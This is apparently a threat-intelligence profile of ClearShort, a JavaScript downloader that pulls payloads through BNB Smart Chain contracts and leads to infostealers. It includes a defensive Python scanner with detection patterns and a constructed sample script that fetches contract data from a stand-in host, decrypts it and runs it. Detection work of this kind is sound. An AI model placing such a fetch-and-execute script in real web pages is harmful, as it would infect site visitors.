Mallory
Malware, used by 1 actor

CLEARSHORT

ClearShort is a multi-stage JavaScript downloader used in UNC5142 malware distribution campaigns and described as an evolution/variant of the ClearFake framework. It is injected into compromised WordPress sites, including plugin files, theme files, and WordPress databases, and has been used at scale across thousands of compromised web pages. ClearShort uses BNB Smart Chain smart contracts as its control layer as part of the broader EtherHiding technique, retrieving additional malicious payloads from blockchain-hosted infrastructure that is resilient to takedown. Google reported UNC5142 evolved this infrastructure from a single smart contract to a three-contract architecture resembling a proxy pattern, enabling rapid updates to payload delivery without reinfecting sites.

Operationally, ClearShort bridges compromised browsers to the blockchain and uses legitimate libraries such as web3.min.js, pako.min.js, and crypto-js.min.js for blockchain interaction, decompression, and decryption. Retrieved data is Base64-encoded, Gzip-compressed, and, since December 2024, AES-encrypted; payloads are decrypted in the browser using AES-GCM and then executed. ClearShort connects to BNB Smart Chain through public nodes or related API services and may fetch landing pages from external infrastructure, including Cloudflare pages.dev-hosted lures.

The infection chain relies on social engineering, particularly ClickFix-style prompts, fake Cloudflare verification, and fake Chrome update lures that trick victims into executing malicious commands. On Windows, observed chains used an HTA file from MediaFire to drop a PowerShell script that fetched final payloads from GitHub, MediaFire, or attacker-controlled infrastructure. On macOS, victims were prompted to run a bash command that downloaded a shell script leading to Atomic Stealer. Malware families distributed via ClearShort-linked UNC5142 activity include Atomic (AMOS), Lumma/Lummac.V2, Rhadamanthys (RadThief), and Vidar. The activity targets both Windows and macOS users visiting compromised sites. Public reporting ties ClearShort with high confidence to the financially motivated actor UNC5142 and to large-scale compromises of WordPress websites used to distribute infostealers.
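The three paragraphs above describe a recognisable footprint in injected WordPress files: the web3/pako/crypto-js library trio, a BNB Smart Chain contract read, and a Base64 > gzip > AES-GCM decode chain. The scanner below is an added example from this editor, not Mallory's or Google's tooling; the indicator strings (the bsc-dataseed public RPC hostname, an eth_call, a 20-byte address literal, the decode function names) are assumptions based on that description, and the sample file contents are constructed.

```python
import re

# Library trio the page says ClearShort loads for chain access, decompression and decryption.
LIBS = ("web3.min.js", "pako.min.js", "crypto-js.min.js")
# Assumed hints of BNB Smart Chain interaction: the bsc-dataseed public RPC hostname,
# a JSON-RPC eth_call, or a 20-byte contract address literal.
CHAIN_HINTS = (r"bsc-dataseed", r"eth_call", r"\b0x[0-9a-fA-F]{40}\b")
# The Base64 -> gzip -> AES-GCM decode chain described above.
DECODE_HINTS = (r"\batob\(", r"pako\.(?:inflate|ungzip)", r"CryptoJS", r"AES-GCM")

def score_content(text):
    """Score one file or database row. A hit needs the library pair plus
    chain access plus decoding; any one of these alone is common in benign code."""
    libs = [lib for lib in LIBS if lib in text]
    chain = sum(1 for pat in CHAIN_HINTS if re.search(pat, text))
    decode = sum(1 for pat in DECODE_HINTS if re.search(pat, text))
    return {
        "libs": libs, "chain_hits": chain, "decode_hits": decode,
        "score": 2 * len(libs) + chain + decode,
        "suspicious": len(libs) >= 2 and chain >= 1 and decode >= 2,
    }

def scan(contents):
    """contents: {path_or_row_id: text} for theme/plugin files or wp_options rows.
    Returns only the suspicious entries."""
    scored = ((name, score_content(text)) for name, text in contents.items())
    return {name: r for name, r in scored if r["suspicious"]}

# Constructed sample contents for demonstration; not real samples, hosts or addresses.
SAMPLES = {
    "wp-content/themes/demo/footer.php":
        "<script src='/wp-includes/js/jquery/jquery.min.js'></script>",
    "wp-content/plugins/demo/inject.js": (
        "<script src='https://cdn.example/web3.min.js'></script>"
        "<script src='https://cdn.example/pako.min.js'></script>"
        "<script src='https://cdn.example/crypto-js.min.js'></script>"
        "<script>var w=new Web3('https://bsc-dataseed.example');"
        "var c=new w.eth.Contract(abi,'0x" + "0" * 40 + "');"
        "c.methods.get().call().then(function(d){var z=pako.ungzip(atob(d));"
        "crypto.subtle.decrypt({name:'AES-GCM',iv:iv},key,z).then(run);});</script>"
    ),
}

if __name__ == "__main__":
    for name, r in scan(SAMPLES).items():
        print(f"{name}: score={r['score']} libs={r['libs']}")
```

Treat a hit as a triage lead, not a verdict: confirm by diffing the flagged file against the vendor's clean release and checking the wp_options and wp_posts tables for the same script block.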


THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

UNC5142

The technical backbone of this operation is CLEARSHORT, a multistage JavaScript downloader designed to bridge compromised browsers with the blockchain.

via the Picus Security blog (picussecurity.com)
INDICATORS OF COMPROMISE

IOCs tracked for this family

1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Hashes
1 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Type: hash.sha1
Value: masked in the public view
Latest sighting: 6 months ago
ACTIVITY FEED

Recent activity

5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching (1)

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution (1)

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.